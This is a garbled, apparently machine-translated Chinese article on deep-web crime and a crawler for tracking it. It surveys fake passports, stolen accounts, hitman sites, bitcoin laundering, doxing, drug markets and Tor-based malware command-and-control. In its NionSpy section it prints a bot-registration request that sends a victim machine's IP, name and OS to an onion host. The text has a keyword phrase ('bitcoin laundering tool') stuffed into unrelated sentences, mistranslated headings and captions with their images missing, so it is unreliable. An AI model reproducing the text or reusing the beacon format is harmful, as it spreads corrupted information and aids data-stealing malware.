比特币洗钱工具 深网中的网络犯罪

左懒 2015/12/11 13:57

0x00 序言

Deep Web涵盖的内容包罗万象，包括动态网页、被屏蔽的网站（需要回答问题或填写验证码才能访问）、个人网站（需要登录凭据才能访问）、非HTML/上下文/脚本内容和受限访问网络等。 然而，由于种种原因，谷歌等搜索引擎无法对暗网内容进行索引。

在 .BIT 域等限制访问网站上注册的 DNS（域名服务）根服务器不受 ICANN（互联网名称与数字地址分配机构）管理。 这些站点在非标准顶级域的标准 DNS 服务器上运行。 要访问这些地下网络（暗网），您需要通过 Tor 等软件访问它们。 而这些地下网络活动是构成深层网络的大部分共同利益的基础。

深网的用途

聪明人在网上买药时不会在普通浏览器中输入这些敏感关键词。 因此，他需要一种匿名上网的方式，使用未公开的IP地址和物理地址进行非法活动。 同样，药品销售商不希望在开设网上商店后被发现其确切位置。 如果注册的域名或网站的IP地址是真实的，查水表就很容易了。

除了需要购买毒品之外，匿名使用 Internet 的原因还有很多。 例如：有人想在政府的监视下偷偷与他人交流，有知情人想向记者透露突发新闻但又不想暴露身份，某些政治制度严密的国家的持不同政见者想安全地向世界通报他们了解该国正在发生的事情。 这些原因导致他们使用了深网的匿名功能。

另外，那些想要图谋暗杀他人的公众人物，需要保证自己不留尾巴。 其他需要匿名的非法服务包括出售非法护照和信用卡。 同样，想要泄露他人私人信息的懒汉也需要通过匿名来保护自己的安全。

表面网络 VS 深层网络

在讨论深网时，不得不提的一个概念就是“明网（Clear Web）”。 它完全可以与深网相媲美，能够被传统搜索引擎收录，无需任何特殊配置即可通过标准网络浏览器浏览互联网。 这个所谓的“可搜索互联网”就是表面网络。

暗网 VS 深网

很多人对Dark Web和Deep Web的概念存在误解，甚至有研究人员将其等同。 但！ ！ 暗网不是深网！ ！ 它只是深层网络的一部分。 暗网依赖于地下网络。 在暗网上，两者之间的通信网络是可信的。 Tor 的隐形互联网项目 (I2P) 是暗网系统的一个示例。

0x01 深网分析器

Deep Web Analyzer (DeWA) 旨在追踪恶意软件作者、发现新的恶意威胁、从深层网络中提取有意义的数据、搜索新的恶意软件活动等。

Deep Web Analyzer 由五个部分组成：

数据收集模块负责从多个来源搜索和保存新的 URL。 一个通用的网关，可以解析那些私有的 DNS 地址，并允许用户像使用 Tor 和 I2P 等软件一样访问隐藏的资源。 页面检测模块负责抓取新的 URL。 数据丰富分析模块整合了来自其他来源的调查信息。 存储索引模块，方便数据进一步分析。 视觉分析工具。

系统总览

数据分析模块

Deep Web Analyzer的第一个模块是数据采集模块，通过以下主站抓取新的URL：

我们监控系统的数据基于：

数据采集​​模块在发现新域名后生成数据索引，并对每个URL组成部分进行流量分析。 这些分析操作使我们能够发现新的恶意软件活动。

通用深网网关

正如我们前面提到的，深网上的资源很难爬取。 需要使用TOR、I2P等专用软件代替DNS、TLD作为网络地址解析工具。 为了方便快速访问深网资源，我们部署了一个Charon（一个透明的代理服务器，可以使用URL向目标服务器发送HTTP请求）。

根据 URL 的种类，Charon 连接到：

页面侦察

对于每个收集到的 URL，执行“侦察”操作。 即尝试连接到 URL 并保存响应数据。 当发生错误时，spy 会保存所有错误信息以供用户查看。 错误是由域名解析、服务器端错误或传输失败引起的。 在 HTTP 请求失败后，间谍会保存整个 HTTP 头，可以用来监视恶意软件对应的主机。 当然，这种情况只是针对特定的HTTP请求。

成功后，间谍使用无头浏览器从下载的页面中提取相关信息：

数据充实

Data Enrichment 由侦察数据组成，对每个侦察成功的页面执行以下操作：

聚类算法生成的词云已经包含了重要的信息。 该算法的工作流程如下：

记录页面上的特殊词和每个词的词频来过滤词，只保留名词，去掉其他的如动词和形容词。 名词只保留单数形式来计算语义距离矩阵：这个矩阵记录了词与词之间的分类距离。 这个矩阵称为 WordNet 矩阵。 WordNet 矩阵测量每个词的分类距离。 例如，“棒球”和“篮球”靠得很近，因为它们都属于“运动”。 同样，“猫”和“狗”的距离也很近，因为它们都属于“动物”。 另一方面，“狗”和“棒球”之间的距离很远。 词集的词距由内向外递增。 一旦我们知道了每个词对的距离，我们就可以创建一组具有相似含义的词。 以词集中使用的第一个词的字母顺序作为标签，利用词集中的分数计算词集中每个词的词频。 前 20 个标签，绘制生成 WordCloud

数据丰富模块允许分析人员快速了解网页的要点。

存储和索引

订阅的 URL 和搜索到的信息根据不同的标准索引方法存储在 Elasticsearch 集群中。 侦察信息为每个网络文档编制索引，搜索功能由 Elasticsearch 提供。 这种关联关键字的方法可以通过文本查询搜索到数千个网页。 每个 URL 组件的 URL 信息也保存为统计信息，可用于确定系统的主机名和查看 URL 的流行程度。 其他用途是：给定一个主机名和参数，你可以查看它的第一次访问，或者找出哪些 URL 被访问得最频繁等。

用户界面和可视化

为了访问和操作数据，我们需要三个不同的前端系统的帮助：

0x02 深网状态

在本节中，我们将介绍一些用我们的系统收集的深度网络应用场景。

我们先来看看近两年收集到的所有现存深网页面的语言分布。

语言检测有两种方式：一种是使用Python的第三方guess_language模块，基于Trigram算法实现，支持离线使用。 第二种是使用谷歌翻译。 使用时需要对比两者的检测质量，避免数据偏差。 例如谷歌翻译就有“未知语言（当页面没有数据时）”的概念。 并且默认使用英文。 因此，一个粗心的错误很容易造成巨大的数据偏差。

下图显示了网页语言的分布。 我们过滤掉了数据量小于1KB的语言（因为数据量太小不划算）。

可以看出，深层网页以英文为主，占所有域名的75%。 其次是俄罗斯，然后是法国（可能包括法国和加拿大）。

接下来，让我们看看近两年收集到的所有域名的URL调用方式（HTTP、HTTPS、FTP……）。 HTTP(s) 协议占 22.000。 如果过滤掉这些数据，您可以看到有趣的数据，如下图所示：

超过 100 个站点使用 IRC(S) 协议。 这些是普通的聊天服务器。 当然，它们也可以用作非法交易的场所或僵尸网络的通信渠道。 同样类型的还有 7 个 XMPP（类似于 Jabber 使用的）域，用于在 TOR 上运行的聊天服务器。

一些深网犯罪活动的例子

深网为人们交易商品或服务提供了一个非常好的翻译环境，并保证了人们在交易过程中的匿名性。 无身份证交易虽然存在很大风险，但也提供了相对的安全性。 这种方法允许深层网络用户自由销售和交易非法商品或服务。 此外，与地下网络犯罪不同，深层网络上的大多数活动都具有重大的“现实世界”影响。

在此我们无法保证这些商品或服务的真实性，只讨论那些真实的网站广告。 并且我们无法涵盖所有​​的产品和服务，这里我们主要介绍几种重要的交易类型。

出售护照和国籍

即使是假护照或身份证也是非常有用的文件。 这些证件不仅可以用来出国（包括买家不容易穿越），还可以用来开银行账户、申请贷款、买房产等等。 所以毫无疑问，护照和身份证都是贵重的商品。 有几个自称出售公务护照和身份证的深层网站，价格因国家和卖家而异。

很难保证没有人会购买这种服务。 特别是那些在国外被骗/被盗/遗失护照身份证的人可能会购买这些非法证件以继续留在该国。

6000 美元以下出售美国公民身份

假护照和其他证件的定价信息和样本

参考：

美国公民身份英国护照假护照，许多国家

盗号

盗号绝不仅限于暗网，这种交易在明网地下也很常见。 我们过去就俄罗斯和中国写过很多关于这个的文章。 其中，信用卡、银行账户、在线拍卖网站和游戏可能是最常见的被盗账户类型。

手表网上不同网站的价格也相差很大。 但成熟的商品往往有一个普遍接受的定价标准。 通常有两种出售方式：优质验证账户，但需要提供清晰的账户余额。 许多未经验证的帐户，但至少其中一些需要有效。 虽然第一种销售方式的成本较高，但可能会带来更多的优质买家。 批发帐户价格会相对便宜。

批量出售未经验证的帐户 – 80% 有效或提供更换

可以发现，在深层网络上销售的产品可以在表层网络上找到对应的产品。 所以在飚王上也不是没有这种类型的论坛，只是深在线看起来更有看头一点。

使用窃取的详细信息创建的复制信用卡

参考：

……被盗的 Paypal 账户未经验证的被盗账户复制被盗的信用卡

暗杀服务

这也是深网中最黑暗的服务之一。 这类服务提供暗杀服务和杀手租赁服务。 放在地面网络上绝对是愚蠢的。 这些服务提供商中有几家存在于深层网络中，并且在他们的网站上公开解释了他们如何维护其业务的机密性。 一个网站明确表示：他们不提供杀手过去工作、过去客户反馈或成功暗杀的证据。 相反，他们使用比特币作为信誉的象征。 最后，只有凶手实施了暗杀并提供了证据，佣金才会支付。

C'thulu 简历 - 雇佣暗杀服务

从上图可以看出，服务的价格根据目标的死亡方式、受伤方式和状态而有所不同。 最近，罗斯·乌布利希 (Ross Ulbricht) 因利用丝绸之路贩毒而被判有罪，并企图雇用五名杀手杀害他的搭档。

还有另一种不同的服务，称为“众包暗杀”。 在 DeadPool 中，用户提出潜在的暗杀目标，其他人将比特币投入“死池”。 刺客预测目标何时以及如何死亡。 如果这个人确实死了，并且达到了预期的结果，刺客就会拿到钱。 到目前为止，已经提出了四个名字，但还没有资金进入资金池。 我们可以猜测这是一个钓鱼网站。

死侍——众包暗杀

参考：

…合同杀手（克苏鲁简历）众包暗杀

比特币和洗钱

比特币（Bitcoin）本身是一种为匿名流通而设计的货币。 因此经常被用来购买非法的商品或服务（当然也可以用来购买合法的东西）。 虽然只要比特币不与你的真实身份挂钩，就可以保证交易的匿名性。 然而，每一笔比特币交易都是完全公开的。 因此，虽然困难重重，但调查人员还是有可能追查资金流向的。

有些服务可以增加系统中硬币的匿名性，使其流通更难追踪。 这些服务通常会通过网络蜘蛛的微交易将您的硬币发回给您。 您在此过程中损失了少量货币（通常减去少量费用），但这会使您的交易更难追踪。

EasyCoin——比特币洗衣服务

比特币洗钱服务可以提高比特币系统中流通资金的匿名性。 但人们最想要的是阻止系统通过其他方式将比特币兑换成现金。 深层网络提供用于转换现金的匿名服务：它们基本上通过 Paypal、ACH、Western Union 或直接通过电子邮件向您发送现金。

WeBuyBitcoins——用比特币兑换现金或电子支付

WeBuyBitcoins 等网站提供非匿名但表面上相对较高的汇率。 犯罪分子可能愿意冒更大的风险来获取更多的现金。 另一种选择是使用比特币购买假币。

以大约面值一半的价格购买伪造的 20 美元

参考：

特斯拉模型使用的比特币 SEasyCoin – 带有免费比特币混合器的比特币钱包 / LaunderyOnionWallet – 带有免费比特币混合器的比特币钱包 / LaunderyWeBuyBitcoins – 出售比特币换取现金 (USD)、ACH、WU/MG、LR、PayPal 和其他假币 20 美元/钞票伪造的 50 美元欧元纸币 伪造的 50 美元美元纸币

政府、执法、法人信息泄露

黑客文化是由志同道合的个人组成的松散或封闭的组织。 由于这种性质，组织之间很容易发生竞争冲突。 当发生冲突时，“Dox”对方是一种常见的做法。 Dox是指通过计算机检索、黑客攻击等行为，将对方的个人信息发布在互联网上。 获取对方个人信息的方式有很多种，但通常会结合公开数据、社会工程和黑客等手段来收集对方的个人信息。

Cloudnine Doxing 网站——注意它需要 SSN、医疗和财务信息等

但 Dox 现象并不仅限于黑客。 针对竞争对手公司、名人和公众人物的 Dox 也很常见。 暴露的信息不仅限于黑客获取的信息，还可能是内部人员泄露的信息。 通常，信息会提交给维基解密。 深层网络也有允许提交此类信息的此类站点。

很难保证这些信息的真实性。 但泄露的信息包括：生日、SSN、个人邮箱、手机号码、住址等。 九云网站列出了一些可能的“Dox”信息：

巴拉克奥巴马的明显个人电子邮件帐户（未验证）

LEA 的明显泄漏（未经验证）

Kim Kardashian 在其他与黑客相关的 dox 中泄密

参考：

Doxing archive维基解密克隆维基解密提交门户可能法官福雷斯特泄漏

病毒

如前所述，深层网络最常用于销售毒品和武器。 但我们不打算在本文中深入探讨这些细节，因为已经有很多文章报道了暗网上的病毒贩卖。 但我们要强调的是，即使是负责丝绸之路贩毒活动的罗斯·乌布利希 (Ross Ulbricht) 最近也被判处无期徒刑。 贩毒对本文的深网权重分析不是很重要。

深网售卖的毒品种类繁多，包括烟草、大麻、毒品、可卡因等。

The Peoples Drug Store——销售海洛因、可卡因、摇头丸等

Grams——深网毒品搜索引擎

除了专门的商店和讨论，还有一个非常受欢迎的网站“Grams”。 该网站的风格有点类似于谷歌，它提供了一个简单的搜索引擎，可以搜索药品。 对于那些想购买毒品的人来说，它已成为深层网络上的旗舰网站。

我们甚至发现TOR中的一些场地也提供了大麻的种植环境：场地的温度、湿度、植物的生命周期。

Growhouse – 显示大麻植物的温度和直播

深网毒贩

本节我们只介绍暗网毒品举报，因为我们想强调：就像丝绸之路一样，它会记录你的犯罪行为。 深层网络根本不是一个好的解决方案。 一方面，买家希望从你这里购买药品，另一方面，卖家需要提供货源。 市场和论坛仅作为交易中转点。 如果你不想用它，只要这个产品的需求量足够大，其他市场就会随着需求而诞生。

参考：

…违禁品烟草大麻致幻剂海洛因、可卡因和其他克——深网毒品搜索引擎来自大麻种植园的实时提要专家洞察视频系列——深网

恶意软件

深层网络和恶意软件可以通过多种方式无缝协作。 特别是在使用深层网络作为C&C控制服务器基础设施时，可以利用TOR和I2P强大的加密功能隐藏位置信息，保证网站和服务的匿名性。 这使得调查人员很难使用传统方式检查服务器 IP 地址和登录详细信息。 此外，这些网站和服务易于使用。 所以不要惊讶为什么有这么多网络罪犯使用 TOR 作为 C&C。 恶意软件通常与 TOR 客户端捆绑在一起。 这种趋势最早始于 2013 年，当时 MEVADE 恶意软件也引起了 TOR 流量的激增，2014 年之后，类 ZBOT 恶意软件家族开始流行。

例如比特币洗钱工具，VAWTRAK 恶意软件是一种通过网络钓鱼电子邮件传播的银行木马。 每个样本使用C&C服务器提供的IP地址列表进行通信，IP地址列表下载到TOR宿主网站（通常是一个图标文件，一般命名为favicon.ico）。 这种方式的好处是保证了犯罪服务器的匿名性。 但这并不是所有人都可以访问，只有那些被感染的系统才能访问 C&C 服务器。

Vawtrak C&C 显示合法的 Favicon

Web 服务器通过 favicon.ico 文件配置 C&C 控制服务器（主要运行在 openresty/1.7.2.1 上）。 我们每天都可以通过搜索这些站点的完整列表来下载最新的 C&C。

从 C&C 获取的 HTTP 标头示例

已识别的基于 TOR 的 C&C (1)

确定的基于 TOR 的 C&C (2)

另一种使用深层网络的恶意软件是 CryptoLocker。 CryptoLockeree是勒索软件勒索软件的一个变种，它会对受害者的个人文档和数据进行加密比特币洗钱工具，并在受害者再次访问时重定向到其网站，从而实现勒索。 CryptoLocker可以自动调整支付页面的语言和支付方式。 TorrentLocker 是 CryptoLocker 的一个变体，它使用 TOR 作为主机并使用比特币作为支付方式。 这就解释了为什么犯罪分子会使用深网作为基础设施，因为它确实更安全。 下面的截图是Deep Web Analyzer抓取的两种语言的支付页面。

Cryptolocker C&C 为台湾和意大利的受害者自动格式化

按受害者和国家分类

以下是恶意软件窃取机密信息的示例。 在我们的搜索方法中，我们使用最近和最短的时间窗口作为查询字符串，以便我们可以快速发现深网中的新威胁。

在此示例中，两个参数 xu 和 xd 在过去一周的流行度激增。 xu 关联了 1700 多个字典值并组成了二进制目标文件。 进一步观察发现，徐某利用NionSpy窃取授权凭证（一般为网银等），然后收集键盘记录器发送至暗网。 同时，xd用于注册感染新的僵尸网络。 注册信息包括受害机器名称和操作系统版本号，通信参数类似如下JSON字符串：

[REDACTED]2xx.onion:80/si.php?xd={“f155”:”MACHINE IP”,”f4336”:”MACHINE NAME”,”f7035”:”5.9.1.1”,”f1121”:”windows”,”f6463”:””,”f2015”:”1”}
复制代码

通过泄漏的数据收集和分析注册相关信息，并建立一个图表，显示每天都有新的受害者。

流行查询字符串参数的自动分析

每天新感染的数量（和泄露的数据，以字节为单位）。

最后值得一提的是：一个名为 Dyre 的木马使用 I2P 作为其 C&C 服务器的备份选项。 一般情况下，使用表面网络的DGA。 该特洛伊木马在浏览器的 Internet Banking 上作为 MiTM 的 BHO 运行。 攻击者可以获得对受感染的受害者银行门户的后门访问权限。 DeWA 在推出这款恶意软件时表示：在过去的 6 个月里，被 I2P 感染的受害者数量显着增加。

到 Dyre 的 I2P 基础设施的流量。

参考：

blog.trendmicro.com/trendlabs-s…blog.trendmicro.com/trendlabs-s…blog.trendmicro.com/trendlabs-s…blog.trendmicro.com/trendlabs-s…Vawtrak / Neverquest C&CCryptolocker C&C